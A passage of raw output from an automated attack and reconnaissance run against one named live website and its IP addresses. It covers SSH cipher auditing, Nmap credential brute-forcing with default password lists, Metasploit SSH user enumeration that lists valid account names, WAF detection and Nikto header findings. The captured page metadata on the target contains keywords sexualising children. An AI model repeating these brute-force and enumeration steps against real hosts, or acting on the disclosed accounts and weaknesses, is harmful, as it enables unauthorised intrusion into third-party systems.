  2172. (enc) 3des-cbc                              -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2173.                                             `- [warn] using weak cipher
  2174.                                             `- [warn] using weak cipher mode
  2175.                                             `- [warn] using small 64-bit block size
  2176.                                             `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
  2177. (enc) blowfish-cbc                          -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2178.                                             `- [fail] disabled since Dropbear SSH 0.53
  2179.                                             `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  2180.                                             `- [warn] using weak cipher mode
  2181.                                             `- [warn] using small 64-bit block size
  2182.                                             `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
  2183. (enc) cast128-cbc                           -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2184.                                             `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  2185.                                             `- [warn] using weak cipher mode
  2186.                                             `- [warn] using small 64-bit block size
  2187.                                             `- [info] available since OpenSSH 2.1.0
  2188. (enc) aes192-cbc                            -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2189.                                             `- [warn] using weak cipher mode
  2190.                                             `- [info] available since OpenSSH 2.3.0
  2191. (enc) aes256-cbc                            -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2192.                                             `- [warn] using weak cipher mode
  2193.                                             `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
  2194. (enc) arcfour                               -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2195.                                             `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  2196.                                             `- [warn] using weak cipher
  2197.                                             `- [info] available since OpenSSH 2.1.0
  2198. (enc) rijndael-cbc@lysator.liu.se           -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2199.                                             `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  2200.                                             `- [warn] using weak cipher mode
  2201.                                             `- [info] available since OpenSSH 2.3.0
  2202.  
  2203. # message authentication code algorithms
  2204. (mac) hmac-md5                              -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2205.                                             `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  2206.                                             `- [warn] using encrypt-and-MAC mode
  2207.                                             `- [warn] using weak hashing algorithm
  2208.                                             `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  2209. (mac) hmac-sha1                             -- [warn] using encrypt-and-MAC mode
  2210.                                             `- [warn] using weak hashing algorithm
  2211.                                             `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  2212. (mac) umac-64@openssh.com                   -- [warn] using encrypt-and-MAC mode
  2213.                                             `- [warn] using small 64-bit tag size
  2214.                                             `- [info] available since OpenSSH 4.7
  2215. (mac) hmac-sha2-256                         -- [warn] using encrypt-and-MAC mode
  2216.                                             `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  2217. (mac) hmac-sha2-256-96                      -- [fail] removed since OpenSSH 6.1, removed from specification
  2218.                                             `- [warn] using encrypt-and-MAC mode
  2219.                                             `- [info] available since OpenSSH 5.9
  2220. (mac) hmac-sha2-512                         -- [warn] using encrypt-and-MAC mode
  2221.                                             `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  2222. (mac) hmac-sha2-512-96                      -- [fail] removed since OpenSSH 6.1, removed from specification
  2223.                                             `- [warn] using encrypt-and-MAC mode
  2224.                                             `- [info] available since OpenSSH 5.9
  2225. (mac) hmac-ripemd160                        -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2226.                                             `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  2227.                                             `- [warn] using encrypt-and-MAC mode
  2228.                                             `- [info] available since OpenSSH 2.5.0
  2229. (mac) hmac-ripemd160@openssh.com            -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2230.                                             `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  2231.                                             `- [warn] using encrypt-and-MAC mode
  2232.                                             `- [info] available since OpenSSH 2.1.0
  2233. (mac) hmac-sha1-96                          -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2234.                                             `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  2235.                                             `- [warn] using encrypt-and-MAC mode
  2236.                                             `- [warn] using weak hashing algorithm
  2237.                                             `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
  2238. (mac) hmac-md5-96                           -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  2239.                                             `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  2240.                                             `- [warn] using encrypt-and-MAC mode
  2241.                                             `- [warn] using weak hashing algorithm
  2242.                                             `- [info] available since OpenSSH 2.5.0
  2243.  
  2244. # algorithm recommendations (for OpenSSH 6.0)
  2245. (rec) -diffie-hellman-group14-sha1          -- kex algorithm to remove
  2246. (rec) -diffie-hellman-group-exchange-sha1   -- kex algorithm to remove
  2247. (rec) -diffie-hellman-group1-sha1           -- kex algorithm to remove
  2248. (rec) -ecdh-sha2-nistp256                   -- kex algorithm to remove
  2249. (rec) -ecdh-sha2-nistp521                   -- kex algorithm to remove
  2250. (rec) -ecdh-sha2-nistp384                   -- kex algorithm to remove
  2251. (rec) -ecdsa-sha2-nistp256                  -- key algorithm to remove
  2252. (rec) -ssh-dss                              -- key algorithm to remove
  2253. (rec) -arcfour                              -- enc algorithm to remove
  2254. (rec) -rijndael-cbc@lysator.liu.se          -- enc algorithm to remove
  2255. (rec) -blowfish-cbc                         -- enc algorithm to remove
  2256. (rec) -3des-cbc                             -- enc algorithm to remove
  2257. (rec) -aes256-cbc                           -- enc algorithm to remove
  2258. (rec) -arcfour256                           -- enc algorithm to remove
  2259. (rec) -cast128-cbc                          -- enc algorithm to remove
  2260. (rec) -aes192-cbc                           -- enc algorithm to remove
  2261. (rec) -arcfour128                           -- enc algorithm to remove
  2262. (rec) -aes128-cbc                           -- enc algorithm to remove
  2263. (rec) -hmac-md5-96                          -- mac algorithm to remove
  2264. (rec) -hmac-sha2-256-96                     -- mac algorithm to remove
  2265. (rec) -hmac-ripemd160                       -- mac algorithm to remove
  2266. (rec) -hmac-sha1-96                         -- mac algorithm to remove
  2267. (rec) -umac-64@openssh.com                  -- mac algorithm to remove
  2268. (rec) -hmac-md5                             -- mac algorithm to remove
  2269. (rec) -hmac-ripemd160@openssh.com           -- mac algorithm to remove
  2270. (rec) -hmac-sha1                            -- mac algorithm to remove
  2271. (rec) -hmac-sha2-512-96                     -- mac algorithm to remove
  2272. Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-16 19:18 EDT
  2273. NSE: [ssh-run] Failed to specify credentials and command to run.
  2274. NSE: [ssh-brute] Trying username/password pair: root:root
  2275. NSE: [ssh-brute] Trying username/password pair: admin:admin
  2276. NSE: [ssh-brute] Trying username/password pair: administrator:administrator
  2277. NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
  2278. NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
  2279. NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
  2280. NSE: [ssh-brute] Trying username/password pair: guest:guest
  2281. NSE: [ssh-brute] Trying username/password pair: user:user
  2282. NSE: [ssh-brute] Trying username/password pair: web:web
  2283. NSE: [ssh-brute] Trying username/password pair: test:test
  2284. NSE: [ssh-brute] Trying username/password pair: root:
  2285. NSE: [ssh-brute] Trying username/password pair: admin:
  2286. NSE: [ssh-brute] Trying username/password pair: administrator:
  2287. NSE: [ssh-brute] Trying username/password pair: webadmin:
  2288. NSE: [ssh-brute] Trying username/password pair: sysadmin:
  2289. NSE: [ssh-brute] Trying username/password pair: netadmin:
  2290. NSE: [ssh-brute] Trying username/password pair: guest:
  2291. NSE: [ssh-brute] Trying username/password pair: user:
  2292. NSE: [ssh-brute] Trying username/password pair: web:
  2293. NSE: [ssh-brute] Trying username/password pair: test:
  2294. NSE: [ssh-brute] Trying username/password pair: root:123456
  2295. NSE: [ssh-brute] Trying username/password pair: admin:123456
  2296. NSE: [ssh-brute] Trying username/password pair: administrator:123456
  2297. NSE: [ssh-brute] Trying username/password pair: webadmin:123456
  2298. NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
  2299. NSE: [ssh-brute] Trying username/password pair: netadmin:123456
  2300. NSE: [ssh-brute] Trying username/password pair: guest:123456
  2301. NSE: [ssh-brute] Trying username/password pair: user:123456
  2302. NSE: [ssh-brute] Trying username/password pair: web:123456
  2303. NSE: [ssh-brute] Trying username/password pair: test:123456
  2304. NSE: [ssh-brute] Trying username/password pair: root:12345
  2305. NSE: [ssh-brute] Trying username/password pair: admin:12345
  2306. NSE: [ssh-brute] Trying username/password pair: administrator:12345
  2307. NSE: [ssh-brute] Trying username/password pair: webadmin:12345
  2308. NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
  2309. NSE: [ssh-brute] Trying username/password pair: netadmin:12345
  2310. NSE: [ssh-brute] Trying username/password pair: guest:12345
  2311. NSE: [ssh-brute] Trying username/password pair: user:12345
  2312. NSE: [ssh-brute] Trying username/password pair: web:12345
  2313. NSE: [ssh-brute] Trying username/password pair: test:12345
  2314. NSE: [ssh-brute] Trying username/password pair: root:123456789
  2315. NSE: [ssh-brute] Trying username/password pair: admin:123456789
  2316. NSE: [ssh-brute] Trying username/password pair: administrator:123456789
  2317. NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
  2318. NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789
  2319. NSE: [ssh-brute] Trying username/password pair: netadmin:123456789
  2320. NSE: [ssh-brute] Trying username/password pair: guest:123456789
  2321. NSE: [ssh-brute] Trying username/password pair: user:123456789
  2322. NSE: [ssh-brute] Trying username/password pair: web:123456789
  2323. NSE: [ssh-brute] Trying username/password pair: test:123456789
  2324. NSE: [ssh-brute] Trying username/password pair: root:password
  2325. NSE: [ssh-brute] Trying username/password pair: admin:password
  2326. NSE: [ssh-brute] Trying username/password pair: administrator:password
  2327. NSE: [ssh-brute] Trying username/password pair: webadmin:password
  2328. NSE: [ssh-brute] Trying username/password pair: sysadmin:password
  2329. NSE: [ssh-brute] Trying username/password pair: netadmin:password
  2330. NSE: [ssh-brute] Trying username/password pair: guest:password
  2331. NSE: [ssh-brute] Trying username/password pair: user:password
  2332. NSE: [ssh-brute] Trying username/password pair: web:password
  2333. NSE: [ssh-brute] Trying username/password pair: test:password
  2334. NSE: [ssh-brute] Trying username/password pair: root:iloveyou
  2335. NSE: [ssh-brute] Trying username/password pair: admin:iloveyou
  2336. NSE: [ssh-brute] Trying username/password pair: administrator:iloveyou
  2337. NSE: [ssh-brute] Trying username/password pair: webadmin:iloveyou
  2338. NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveyou
  2339. NSE: [ssh-brute] Trying username/password pair: netadmin:iloveyou
  2340. NSE: [ssh-brute] Trying username/password pair: guest:iloveyou
  2341. NSE: [ssh-brute] Trying username/password pair: user:iloveyou
  2342. NSE: [ssh-brute] Trying username/password pair: web:iloveyou
  2343. NSE: [ssh-brute] Trying username/password pair: test:iloveyou
  2344. NSE: [ssh-brute] Trying username/password pair: root:princess
  2345. NSE: [ssh-brute] Trying username/password pair: admin:princess
  2346. NSE: [ssh-brute] Trying username/password pair: administrator:princess
  2347. NSE: [ssh-brute] Trying username/password pair: webadmin:princess
  2348. NSE: [ssh-brute] Trying username/password pair: sysadmin:princess
  2349. NSE: [ssh-brute] Trying username/password pair: netadmin:princess
  2350. NSE: [ssh-brute] Trying username/password pair: guest:princess
  2351. NSE: [ssh-brute] Trying username/password pair: user:princess
  2352. NSE: [ssh-brute] Trying username/password pair: web:princess
  2353. NSE: [ssh-brute] Trying username/password pair: test:princess
  2354. NSE: [ssh-brute] Trying username/password pair: root:12345678
  2355. NSE: [ssh-brute] Trying username/password pair: admin:12345678
  2356. NSE: [ssh-brute] Trying username/password pair: administrator:12345678
  2357. NSE: [ssh-brute] Trying username/password pair: webadmin:12345678
  2358. NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678
  2359. NSE: [ssh-brute] Trying username/password pair: netadmin:12345678
  2360. NSE: [ssh-brute] Trying username/password pair: guest:12345678
  2361. NSE: [ssh-brute] Trying username/password pair: user:12345678
  2362. NSE: [ssh-brute] Trying username/password pair: web:12345678
  2363. NSE: [ssh-brute] Trying username/password pair: test:12345678
  2364. NSE: [ssh-brute] Trying username/password pair: root:1234567
  2365. NSE: [ssh-brute] Trying username/password pair: admin:1234567
  2366. NSE: [ssh-brute] Trying username/password pair: administrator:1234567
  2367. NSE: [ssh-brute] Trying username/password pair: webadmin:1234567
  2368. NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567
  2369. NSE: [ssh-brute] Trying username/password pair: netadmin:1234567
  2370. NSE: [ssh-brute] Trying username/password pair: guest:1234567
  2371. NSE: [ssh-brute] Trying username/password pair: user:1234567
  2372. NSE: [ssh-brute] Trying username/password pair: web:1234567
  2373. NSE: [ssh-brute] Trying username/password pair: test:1234567
  2374. NSE: [ssh-brute] Trying username/password pair: root:abc123
  2375. NSE: [ssh-brute] Trying username/password pair: admin:abc123
  2376. NSE: [ssh-brute] Trying username/password pair: administrator:abc123
  2377. NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
  2378. NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
  2379. NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
  2380. NSE: [ssh-brute] Trying username/password pair: guest:abc123
  2381. NSE: [ssh-brute] Trying username/password pair: user:abc123
  2382. NSE: [ssh-brute] Trying username/password pair: web:abc123
  2383. NSE: [ssh-brute] Trying username/password pair: test:abc123
  2384. NSE: [ssh-brute] Trying username/password pair: root:nicole
  2385. NSE: [ssh-brute] Trying username/password pair: admin:nicole
  2386. NSE: [ssh-brute] Trying username/password pair: administrator:nicole
  2387. NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
  2388. NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
  2389. NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
  2390. NSE: [ssh-brute] Trying username/password pair: guest:nicole
  2391. NSE: [ssh-brute] Trying username/password pair: user:nicole
  2392. NSE: [ssh-brute] Trying username/password pair: web:nicole
  2393. NSE: [ssh-brute] Trying username/password pair: test:nicole
  2394. NSE: [ssh-brute] Trying username/password pair: root:daniel
  2395. NSE: [ssh-brute] Trying username/password pair: admin:daniel
  2396. NSE: [ssh-brute] Trying username/password pair: administrator:daniel
  2397. NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
  2398. NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
  2399. NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
  2400. NSE: [ssh-brute] Trying username/password pair: guest:daniel
  2401. NSE: [ssh-brute] Trying username/password pair: user:daniel
  2402. NSE: [ssh-brute] Trying username/password pair: web:daniel
  2403. NSE: [ssh-brute] Trying username/password pair: test:daniel
  2404. NSE: [ssh-brute] Trying username/password pair: root:monkey
  2405. Nmap scan report for tinymodel-sugar.info (94.102.49.50)
  2406. Host is up (0.12s latency).
  2407. Other addresses for tinymodel-sugar.info (not scanned): 94.102.49.48
  2408. rDNS record for 94.102.49.50: no-reverse-dns-configured.com
  2409.  
  2410. PORT   STATE SERVICE VERSION
  2411. 22/tcp open  ssh     OpenSSH 5.1p1 Debian 5 (protocol 2.0)
  2412. | ssh-auth-methods:
  2413. |   Supported authentication methods:
  2414. |     publickey
  2415. |_    password
  2416. | ssh-brute:
  2417. |   Accounts: No valid accounts found
  2418. |_  Statistics: Performed 131 guesses in 211 seconds, average tps: 0.8
  2419. | ssh-hostkey:
  2420. |   1024 45:fa:db:ab:79:4f:d4:0f:54:2e:5e:dd:9f:f0:d8:b2 (DSA)
  2421. |_  2048 46:7d:3c:e5:84:2b:da:1d:a7:22:eb:f0:35:13:ef:e6 (RSA)
  2422. |_ssh-publickey-acceptance: ERROR: Script execution failed (use -d to debug)
  2423. |_ssh-run: Failed to specify credentials and command to run.
  2424. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  2425. Device type: general purpose|switch|remote management|firewall|printer|security-misc|media device|WAP
  2426. Running (JUST GUESSING): Linux 3.X|2.6.X|2.4.X (95%), Extreme Networks ExtremeXOS 12.X (94%), HP embedded (94%), Barracuda Networks embedded (94%), HP Onboard Administrator 4.X (92%), Kyocera embedded (92%), Sony embedded (91%)
  2427. OS CPE: cpe:/o:linux:linux_kernel:3.2.0 cpe:/o:extremenetworks:extremexos:12.5.4 cpe:/a:hp:onboard_administrator:2.04 cpe:/o:linux:linux_kernel:2.6.15 cpe:/a:hp:onboard_administrator:4 cpe:/h:kyocera:cs-2560 cpe:/o:linux:linux_kernel:2.4.30
  2428. Aggressive OS guesses: Linux 3.2.0 (95%), Extreme Networks ExtremeXOS 12.5.4 (94%), HP Onboard Administrator 2.04 (94%), HP Onboard Administrator 2.25 - 3.31 (94%), Linux 2.6.15 (Ubuntu) (94%), Linux 2.6.15 - 2.6.26 (likely embedded) (94%), Linux 2.6.16 (94%), Linux 2.6.26 (94%), Barracuda Web Application Firewall 460 (94%), Linux 2.6.18 - 2.6.22 (94%)
  2429. No exact OS matches for host (test conditions non-ideal).
  2430. Network Distance: 7 hops
  2431. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  2432.  
  2433. TRACEROUTE (using port 22/tcp)
  2434. HOP RTT       ADDRESS
  2435. 1   110.83 ms 10.13.0.1
  2436. 2   109.86 ms 37.187.24.252
  2437. 3   110.87 ms po101.gra-g2-a75.fr.eu (178.33.103.231)
  2438. 4   ...
  2439. 5   117.15 ms be100-1112.ams-5-a9.nl.eu (213.251.128.67)
  2440. 6   ...
  2441. 7   117.20 ms no-reverse-dns-configured.com (94.102.49.50)
  2442.  
  2443.  
  2444.        =[ metasploit v4.16.10-dev                         ]
  2445. + -- --=[ 1687 exploits - 966 auxiliary - 299 post        ]
  2446. + -- --=[ 499 payloads - 40 encoders - 10 nops            ]
  2447. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  2448.  
  2449. USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
  2450. RHOSTS => tinymodel-sugar.info
  2451. [!] RHOST is not a valid option for this module. Did you mean RHOSTS?
  2452. RHOST => tinymodel-sugar.info
  2453. [*] 94.102.49.50:22 - SSH - Checking for false positives
  2454. [*] 94.102.49.50:22 - SSH - Starting scan
  2455. [+] 94.102.49.50:22 - SSH - User 'admin' found
  2456. [+] 94.102.49.50:22 - SSH - User 'administrator' found
  2457. [+] 94.102.49.50:22 - SSH - User 'anonymous' found
  2458. [-] 94.102.49.50:22 - SSH - User 'backup' not found
  2459. [-] 94.102.49.50:22 - SSH - User 'bee' not found
  2460. [-] 94.102.49.50:22 - SSH - User 'ftp' not found
  2461. [-] 94.102.49.50:22 - SSH - User 'guest' not found
  2462. [-] 94.102.49.50:22 - SSH - User 'GUEST' not found
  2463. [-] 94.102.49.50:22 - SSH - User 'info' not found
  2464. [-] 94.102.49.50:22 - SSH - User 'mail' not found
  2465. [-] 94.102.49.50:22 - SSH - User 'mailadmin' not found
  2466. [-] 94.102.49.50:22 - SSH - User 'msfadmin' not found
  2467. [-] 94.102.49.50:22 - SSH - User 'mysql' not found
  2468. [-] 94.102.49.50:22 - SSH - User 'nobody' not found
  2469. [-] 94.102.49.50:22 - SSH - User 'oracle' not found
  2470. [-] 94.102.49.50:22 - SSH - User 'owaspbwa' not found
  2471. [-] 94.102.49.50:22 - SSH - User 'postfix' not found
  2472. [-] 94.102.49.50:22 - SSH - User 'postgres' not found
  2473. [+] 94.102.49.50:22 - SSH - User 'private' found
  2474. [-] 94.102.49.50:22 - SSH - User 'proftpd' not found
  2475. [-] 94.102.49.50:22 - SSH - User 'public' not found
  2476. [-] 94.102.49.50:22 - SSH - User 'root' not found
  2477. [-] 94.102.49.50:22 - SSH - User 'superadmin' not found
  2478. [-] 94.102.49.50:22 - SSH - User 'support' not found
  2479. [-] 94.102.49.50:22 - SSH - User 'sys' not found
  2480. [-] 94.102.49.50:22 - SSH - User 'system' not found
  2481. [+] 94.102.49.50:22 - SSH - User 'systemadmin' found
  2482. [-] 94.102.49.50:22 - SSH - User 'systemadministrator' not found
  2483. [-] 94.102.49.50:22 - SSH - User 'test' not found
  2484. [-] 94.102.49.50:22 - SSH - User 'tomcat' not found
  2485. [-] 94.102.49.50:22 - SSH - User 'user' not found
  2486. [-] 94.102.49.50:22 - SSH - User 'webmaster' not found
  2487. [-] 94.102.49.50:22 - SSH - User 'www-data' not found
  2488. [-] 94.102.49.50:22 - SSH - User 'Fortimanager_Access' not found
  2489. [*] Scanned 1 of 2 hosts (50% complete)
  2490. [*] 94.102.49.48:22 - SSH - Checking for false positives
  2491. [-] 94.102.49.48:22 - SSH - throws false positive results. Aborting.
  2492. [*] Scanned 2 of 2 hosts (100% complete)
  2493. [*] Auxiliary module execution completed
  2494. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: KEY_FILE.
  2495. [+] 94.102.49.48:22       - SSH server version: SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u3 ( service.version=6.0p1 openssh.comment=Debian-4+deb7u3 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH os.vendor=Debian os.device=General os.family=Linux os.product=Linux os.version=7.0 service.protocol=ssh fingerprint_db=ssh.banner )
  2496. [*] tinymodel-sugar.info:22 - Scanned 1 of 2 hosts (50% complete)
  2497. [+] 94.102.49.50:22       - SSH server version: SSH-2.0-OpenSSH_5.1p1 Debian-5 ( service.version=5.1p1 openssh.comment=Debian-5 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH os.vendor=Debian os.device=General os.family=Linux os.product=Linux os.version=8.0 service.protocol=ssh fingerprint_db=ssh.banner )
  2498. [*] tinymodel-sugar.info:22 - Scanned 2 of 2 hosts (100% complete)
  2499. [*] Auxiliary module execution completed
  2500.  + -- --=[Port 23 closed... skipping.
  2501.  + -- --=[Port 25 closed... skipping.
  2502.  + -- --=[Port 53 closed... skipping.
  2503.  + -- --=[Port 79 closed... skipping.
  2504.  + -- --=[Port 80 opened... running tests...
  2505.  + -- ----------------------------=[Checking for WAF]=------------------------ -- +
  2506.  
  2507.                                  ^     ^
  2508.         _   __  _   ____ _   __  _    _   ____
  2509.        ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  2510.       | V V // o // _/ | V V // 0 // 0 // _/
  2511.       |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/
  2512.                                 <
  2513.                                  ...'
  2514.  
  2515.     WAFW00F - Web Application Firewall Detection Tool
  2516.  
  2517.     By Sandro Gauci && Wendel G. Henrique
  2518.  
  2519. Checking http://tinymodel-sugar.info
  2520. Generic Detection results:
  2521. The site http://tinymodel-sugar.info seems to be behind a WAF or some sort of security solution
  2522. Reason: The server header is different when an attack is detected.
  2523. The server header for a normal response is "nginx/1.8.1", while the server header a response to an attack is "nginx/1.0.6.",
  2524. Number of requests: 12
  2525.  
  2526.  + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
  2527. http://tinymodel-sugar.info [200 OK] Country[NETHERLANDS][NL], HTTPServer[nginx/1.0.6], IP[94.102.49.48], Title[TinyModel Sugar], nginx[1.0.6]
  2528.  
  2529.    __  ______ _____ 
  2530.    \ \/ / ___|_   _|
  2531.     \  /\___ \ | |  
  2532.     /  \ ___) || |  
  2533.    /_/\_|____/ |_|  
  2534.  
  2535. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  2536. + -- --=[Target: tinymodel-sugar.info:80
  2537. + -- --=[Site not vulnerable to Cross-Site Tracing!
  2538. + -- --=[Site not vulnerable to Host Header Injection!
  2539. + -- --=[Site vulnerable to Cross-Frame Scripting!
  2540. + -- --=[Site vulnerable to Clickjacking!
  2541.  
  2542. HTTP/1.1 405 Not Allowed
  2543. Server: nginx/1.0.6
  2544. Date: Mon, 16 Oct 2017 23:27:15 GMT
  2545. Content-Type: text/html
  2546. Content-Length: 172
  2547. Connection: close
  2548.  
  2549. <html>
  2550. <head><title>405 Not Allowed</title></head>
  2551. <body bgcolor="white">
  2552. <center><h1>405 Not Allowed</h1></center>
  2553. <hr><center>nginx/1.0.6</center>
  2554. </body>
  2555. </html>
  2556. 
  2557. HTTP/1.1 200 OK
  2558. Server: nginx/1.0.6
  2559. Date: Mon, 16 Oct 2017 23:27:16 GMT
  2560. Content-Type: text/html
  2561. Connection: keep-alive
  2562. Last-Modified: Sat, 07 Jan 2017 10:52:45 GMT
  2563. ETag: "ee0-5457eef355940"
  2564. Accept-Ranges: bytes
  2565. Content-Length: 3808
  2566.  
  2567. <HTML>
  2568. <HEAD>
  2569. <TITLE>TinyModel Sugar</TITLE>
  2570. <meta name="description" content="Agents, Casting Directors, Film Producers, Designers, Advertising Agencies, Photographers, Magazine Editors, etc: HQ PHOTOS BY TINYMODEL SUGAR!! No nudity or pornography at all here">
  2571. <meta name="keywords" content="Nonudebase, nonudebase.com, newstar, new star,tinymodel, tinymodels, tiny model,
  2572. sweet model, alexandra,gia, sharona, erin, laura, princess, michelle, daniele,
  2573. jenna, cherry, diana, lola, cutie, rocky, sunshine, amy, amber, caramel, cinnamon,
  2574. ginger, raven, nicole, mercedes, princess, jewel, electra, dolly, britney, krissy,
  2575. chrissy, richie, destiny, jimmy, krystal, sugar, brandi, kiki, chrissy, children,
  2576. kids, teen, teens, preteens,  child modelling sites, Lolita, Newstar models, sw
  2577.  
  2578.  
  2579.  
  2580.  + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
  2581. + -- --=[Checking if X-Content options are enabled on tinymodel-sugar.info... 
  2582.  
  2583. + -- --=[Checking if X-Frame options are enabled on tinymodel-sugar.info... 
  2584.  
  2585. + -- --=[Checking if X-XSS-Protection header is enabled on tinymodel-sugar.info... 
  2586.  
  2587. + -- --=[Checking HTTP methods on tinymodel-sugar.info... 
  2588. Allow: GET,HEAD,POST,OPTIONS,TRACE
  2589.  
  2590. + -- --=[Checking if TRACE method is enabled on tinymodel-sugar.info... 
  2591.  
  2592. + -- --=[Checking for META tags on tinymodel-sugar.info... 
  2593. <meta name="description" content="Agents, Casting Directors, Film Producers, Designers, Advertising Agencies, Photographers, Magazine Editors, etc: HQ PHOTOS BY TINYMODEL SUGAR!! No nudity or pornography at all here">
  2594. <meta name="keywords" content="Nonudebase, nonudebase.com, newstar, new star,tinymodel, tinymodels, tiny model,
  2595. <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">
  2596.  
  2597. + -- --=[Checking for open proxy on tinymodel-sugar.info... 
  2598. </p>
  2599.  
  2600. <h2>Error 403</h2>
  2601. <address>
  2602.   <a href="/">google.com</a><br />
  2603.   <span>Apache</span>
  2604. </address>
  2605. </body>
  2606. </html>
  2607.  
  2608.  
  2609. + -- --=[Enumerating software on tinymodel-sugar.info... 
  2610. Server: nginx/1.8.1
  2611.  
  2612. + -- --=[Checking if Strict-Transport-Security is enabled on tinymodel-sugar.info... 
  2613.  
  2614. + -- --=[Checking for Flash cross-domain policy on tinymodel-sugar.info... 
  2615. </p>
  2616.  
  2617. <h2>Error 404</h2>
  2618. <address>
  2619.   <a href="/">tinymodel-sugar.info</a><br />
  2620.   <span>Apache</span>
  2621. </address>
  2622. </body>
  2623. </html>
  2624.  
  2625.  
  2626. + -- --=[Checking for Silverlight cross-domain policy on tinymodel-sugar.info... 
  2627. </p>
  2628.  
  2629. <h2>Error 404</h2>
  2630. <address>
  2631.   <a href="/">tinymodel-sugar.info</a><br />
  2632.   <span>Apache</span>
  2633. </address>
  2634. </body>
  2635. </html>
  2636.  
  2637.  
  2638. + -- --=[Checking for HTML5 cross-origin resource sharing on tinymodel-sugar.info... 
  2639.  
  2640. + -- --=[Retrieving robots.txt on tinymodel-sugar.info... 
  2641. </p>
  2642.  
  2643. <h2>Error 404</h2>
  2644. <address>
  2645.   <a href="/">tinymodel-sugar.info</a><br />
  2646.   <span>Apache</span>
  2647. </address>
  2648. </body>
  2649. </html>
  2650.  
  2651.  
  2652. + -- --=[Retrieving sitemap.xml on tinymodel-sugar.info... 
  2653. </p>
  2654.  
  2655. <h2>Error 404</h2>
  2656. <address>
  2657.   <a href="/">tinymodel-sugar.info</a><br />
  2658.   <span>Apache</span>
  2659. </address>
  2660. </body>
  2661. </html>
  2662.  
  2663.  
  2664. + -- --=[Checking cookie attributes on tinymodel-sugar.info... 
  2665.  
  2666. + -- --=[Checking for ASP.NET Detailed Errors on tinymodel-sugar.info... 
  2667. If you think this is a server error, please contact
  2668. <h2>Error 404</h2>
  2669. If you think this is a server error, please contact
  2670. <h2>Error 404</h2>
  2671.  
  2672. 
  2673.  + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
  2674. - Nikto v2.1.6
  2675. ---------------------------------------------------------------------------
  2676. + Target IP:          94.102.49.48
  2677. + Target Hostname:    tinymodel-sugar.info
  2678. + Target Port:        80
  2679. + Start Time:         2017-10-16 19:27:22 (GMT-4)
  2680. ---------------------------------------------------------------------------
  2681. + Server: nginx/1.0.6
  2682. + Server leaks inodes via ETags, header found with file /, fields: 0xee0 0x5457eef355940
  2683. + The anti-clickjacking X-Frame-Options header is not present.
  2684. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  2685. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  2686. + OSVDB-637: Enumeration of users is possible by requesting ~username (responds with 'Forbidden' for users, 'not found' for non-existent users).
  2687. + Server banner has changed from 'nginx/1.0.6' to 'nginx/1.8.1' which may suggest a WAF, load balancer or proxy is in place
